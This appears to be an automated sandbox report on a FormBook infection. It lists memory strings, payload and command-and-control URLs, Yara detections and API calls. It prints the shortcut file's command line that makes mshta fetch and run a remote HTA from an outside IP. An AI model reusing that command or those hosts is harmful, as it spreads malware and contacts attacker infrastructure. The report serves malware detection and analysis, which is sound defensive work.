Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569server-timing: processing;dur=13content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7efsWEkAW5KN724jM4PIt5%2BPnHVXim8zh3om1wxAFVlData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572server-timing: processing;dur=10content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrzTHDOdGwhQJAbFqQqq3IqRQX0H7ZbPYp32%2Fc%2FNM5Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574server-timing: processing;dur=12content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zAkIpE2UUB1d%2BxlWY3heRgo6geK3PUv9hj7N%2FelFFXData Raw: Data Ascii:
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.8
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.1
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.12
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.2
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.22
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/r
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/ro
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/roo
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/r
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/ro
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/roo
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room
Source: mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp, Offer Document 24.lnk String found in binary or memory: http://20.86.128.223/room/room4.hta
Source: mshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta$
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta....=H
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta...H2
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta4.C:
Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta8N
Source: mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta;H
Source: mshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaC:
Source: mshta.exe, 00000003.00000002.1489938203.00000237E1260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaFPS_BROWSER_AP
Source: mshta.exe, 00000003.00000002.1489900922.00000237E1230000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaH
Source: mshta.exe, 00000003.00000003.1484607386.0000023FE4512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1482542643.0000023FE44E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483734633.0000023FE44FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483458080.0000023FE44F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489199159.0000023FE4514000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaLMEMH
Source: mshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaY
Source: mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htao
Source: mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htastricted
Source: mshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htat
Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaventindowsINetCookiesIO
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.e
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.ex
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.exe
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.exep
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.1H2
Source: svchost.exe, 00000008.00000002.3113103128.0000024A08800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3837430947.00000000023EE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.joyesi.xyz
Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3837430947.00000000023EE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.joyesi.xyz/fo8o/
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000046E6000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003966000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://donnavariedades.com/fo8o?Plm0mn68=l
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.8.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1476761679.0000024A08710000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.1443610984.0000021E63FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co9
Source: mshta.exe, 00000003.00000002.1490295950.00000237E135A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 0000000A.00000003.1779391791.000000000783F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000004A0A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003C8A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&amp;Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prI
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Found URL in windows shortcut file (LNK)
Source: Initial file Strings: http://20.86.128.223/room/room4.hta
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\rooma.exe Jump to dropped file
Windows shortcut file (LNK) contains suspicious command line arguments
Source: Offer Document 24.lnk LNK file: . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009DB363 NtClose, 7_2_009DB363
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B1D09 NtProtectVirtualMemory, 7_2_009B1D09
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D35C0 NtCreateMutant,LdrInitializeThunk, 7_2_015D35C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2B60 NtClose,LdrInitializeThunk, 7_2_015D2B60
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_015D2DF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_015D2C70
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3010 NtOpenDirectoryObject, 7_2_015D3010
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3090 NtSetValueKey, 7_2_015D3090
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D4340 NtSetContextThread, 7_2_015D4340
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D4650 NtSuspendThread, 7_2_015D4650
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D39B0 NtGetContextThread, 7_2_015D39B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2BF0 NtAllocateVirtualMemory, 7_2_015D2BF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2BE0 NtQueryValueKey, 7_2_015D2BE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2B80 NtQueryInformationFile, 7_2_015D2B80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2BA0 NtEnumerateValueKey, 7_2_015D2BA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2AD0 NtReadFile, 7_2_015D2AD0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2AF0 NtWriteFile, 7_2_015D2AF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2AB0 NtWaitForSingleObject, 7_2_015D2AB0
